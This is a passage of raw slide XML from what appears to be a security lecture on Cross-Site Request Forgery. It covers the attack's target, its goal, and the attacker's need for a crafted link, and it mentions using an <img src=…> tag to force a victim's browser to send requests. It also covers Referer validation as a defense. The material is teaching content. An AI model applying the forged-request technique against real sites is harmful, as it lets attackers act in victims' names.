                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54B4FC53-4D00-7A41-88BA-08485FE95CAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8882063" y="2743200"/>
            <a:ext cx="46037" cy="2251075"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 45719"/>
              <a:gd name="T1" fmla="*/ 0 h 847089"/>
              <a:gd name="T2" fmla="*/ 0 w 45719"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 847089"/>
              <a:gd name="T4" fmla="*/ 0 60000 65536"/>
              <a:gd name="T5" fmla="*/ 0 60000 65536"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T4">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T5">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="45719" h="847089">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="846892"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="1964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object 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39FBB590-13D5-594F-9D9D-D57BAE33D13B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8991600" y="3776663"/>
            <a:ext cx="582613" cy="404812"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>$$$</a:t>
            </a:r>
            <a:endParaRPr sz="26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99CCAC5-CEAA-9A49-AEA0-BBED340275EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="812800"/>
            <a:ext cx="8515350" cy="892175"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="57050" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="41203" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="5300" spc="-25" dirty="0"/>
              <a:t>Cross-Site </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5300" spc="15" dirty="0"/>
              <a:t>Request</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5300" spc="-10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5300" spc="25" dirty="0"/>
              <a:t>Forgery</a:t>
            </a:r>
            <a:endParaRPr sz="5300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B406EFFA-59EF-354E-9818-E60C0DB460A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="2400300"/>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4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E264E0B1-BCFD-B246-8EA2-17550EC271F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="2343150"/>
            <a:ext cx="7791450" cy="379413"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Target</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-40" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>User who has an </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="35" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>account </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>on a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="95" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>server</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02249F74-6F4B-9A47-9E1D-0AA9C0B226FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="3127375"/>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6" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{769BC2D5-2AC3-1F4E-A46F-B30D9CC89433}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="3067050"/>
            <a:ext cx="8188325" cy="379413"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Attack </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="25" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>goal</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="25" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Send </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>requests </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>server </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>via </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-35" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>user’s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>browser</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB78B525-B425-D54D-8380-C00E262E0E30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="3619500"/>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8" name="object 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7821D8A-141E-E145-8A05-AD321062D437}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1409700" y="3562350"/>
            <a:ext cx="6373813" cy="379413"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Look </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>server like </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>user </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="30" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>intended </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>them</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C9D3249-5584-7A4F-BC9B-223141B15460}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="4346575"/>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85002" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F6B02DC-1D54-994D-954E-70FDE4B65626}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="4302125"/>
            <a:ext cx="753268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900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Attacker needs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Ability to get the user to “click a link”  crafted by the attacker that goes to the vulnerable site</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BD6BFA0-6BF1-6A45-B51E-57516FDF848C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="5437188"/>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2" name="object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C353CFE6-36BD-D046-A904-DC3A4D326698}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="5378450"/>
            <a:ext cx="1477963" cy="379413"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Key</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-55" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>tricks</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="object 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D85DDF2F-ECC9-C14B-82C7-3F7A5BBB8E37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="5929313"/>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4" name="object 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BD63B33-4A80-284E-BC76-972CDD5A33A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="6427788"/>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85007" name="object 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A079B64-210E-2D48-972D-0BEEC18E4D8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1409700" y="5751513"/>
            <a:ext cx="757237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3000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Requests to the web server have predictable structure  Use e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;img src=…&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>to force victim to send it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B54228E8-0E81-B149-A898-FDCE60DA2F12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="381000"/>
            <a:ext cx="8515350" cy="784225"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Another example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="86019" name="Picture 2" descr="https://miro.medium.com/max/1407/1*g_ISMQPCQpjw-6w3JRFUKQ.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{849371FF-1FD2-F34E-8073-5956843AB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1905000"/>
            <a:ext cx="10171113"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6FA5000-A80C-D64E-855B-F2E5C1E3B6E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="50800"/>
            <a:ext cx="8515350" cy="896938"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="38033" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="28526" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="5500" dirty="0"/>
              <a:t>Defense: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5500" spc="-55" dirty="0"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5500" spc="-50" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5500" spc="30" dirty="0"/>
              <a:t>validation</a:t>
            </a:r>
            <a:endParaRPr sz="5500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16F4043E-3C21-884F-806E-4B36970E7DD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="2825750"/>
            <a:ext cx="131762" cy="246063"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="254" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>•</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C91A2370-92FE-C642-B4E9-C60082240849}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1041400" y="2778125"/>
            <a:ext cx="8080375" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200" spc="10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Policy: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-55" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Trust </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="20" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>requests </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="60" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>pages </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>user </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="60" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>could </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" b="1" spc="10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>legitimately</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" b="1" spc="-30" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="30" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>reach</a:t>
            </a:r>
            <a:endParaRPr sz="2200" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
